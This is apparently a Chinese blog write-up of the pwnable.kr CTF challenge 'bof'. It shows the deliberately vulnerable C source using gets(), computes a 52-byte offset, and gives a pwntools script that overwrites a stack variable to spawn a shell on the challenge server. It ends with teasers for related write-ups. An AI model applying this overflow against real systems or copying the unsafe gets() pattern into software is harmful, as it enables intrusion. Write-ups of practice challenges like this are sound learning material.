[Toddler's Bottle]-bof

作者: 2mpossible | 来源:发表于2017-09-02 12:13 被阅读0次

[Toddler's Bottle]-bof
[Toddler's Bottle]-blackjack
[Toddler's Bottle]-fd
[Toddler's Bottle]-collision
[Toddler's Bottle]-random
[Toddler's Bottle]-flag
[Toddler's Bottle]-passcode
[Toddler's Bottle]-input
[Toddler's Bottle]-leg
[Toddler's Bottle]-mistake

下载好源码和源文件：

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);   // smash me!
    if(key == 0xcafebabe){
            system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}
int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}

从源码可以看出这题大概是要溢出overflowme从而覆盖key的值为0xcafebabe，只要知道覆盖的大小是多少即可，IDA分析一下

image.png

发现overflowme的基址为ebp-0x2c，即44个字节，再加上ebp和返回地址的8个字节就是52个字节，最后的4个字节覆盖key就可以了，直接上脚本

from pwn import *
p = remote('pwnable.kr',9000)
playload = 'a'*52
playload += p32(0xcafebabe)
p.sendline(playload)
p.interactive()

拿到flag

image.png

[Toddler's Bottle]-bof
下载好源码和源文件：从源码可以看出这题大概是要溢出overflowme从而覆盖key的值为0xcafebabe，...
[Toddler's Bottle]-blackjack
一个经典的21点游戏，我们的目标是赚到1百万才有flag，看源码发现bet可以输入负数，比如输入-10000000...
[Toddler's Bottle]-fd
由于刚入手pwn，所以想着做些基础的题来提升自己，为了以后方便回顾首先来看源码首先可以知道我们运行程序的时候需要...
[Toddler's Bottle]-collision
代码如下：首先要有一个命令行参数，而且长度必须为20跟着在check_password里面强制转化为int指针，...
[Toddler's Bottle]-random
首先我们看源代码可以看到random这个函数，由于没有设置种子(设置种子也要变化啊)所以可以知道这里是伪随机数，...
[Toddler's Bottle]-flag
这题一开始用ida看什么都没看出来，后来看了网上的WP才知道这题是加了壳的，从十六进制中可以看到确实加了upx壳 ...
[Toddler's Bottle]-passcode
之前一直不能下载文件到本地，今天用了FlashFXP无意间可以下载到本地了主要@前面的是用户名，之前一直不知道 ...
[Toddler's Bottle]-input
需要对linux操作有一定的认识，前面的绕过ida或者看源码都能推出来，最后由于我们在input2目录下没有写文件...
[Toddler's Bottle]-leg
key1()函数获取pc寄存器的值，key2()函数获取pc寄存器 + 4的值，key3()函数获得lr寄存器的值...
[Toddler's Bottle]-mistake
从ida反编译结果来看，有两次输入，只要第一次的输入字符每一位异或1后与第二次输入的字符相等就会cat flag ...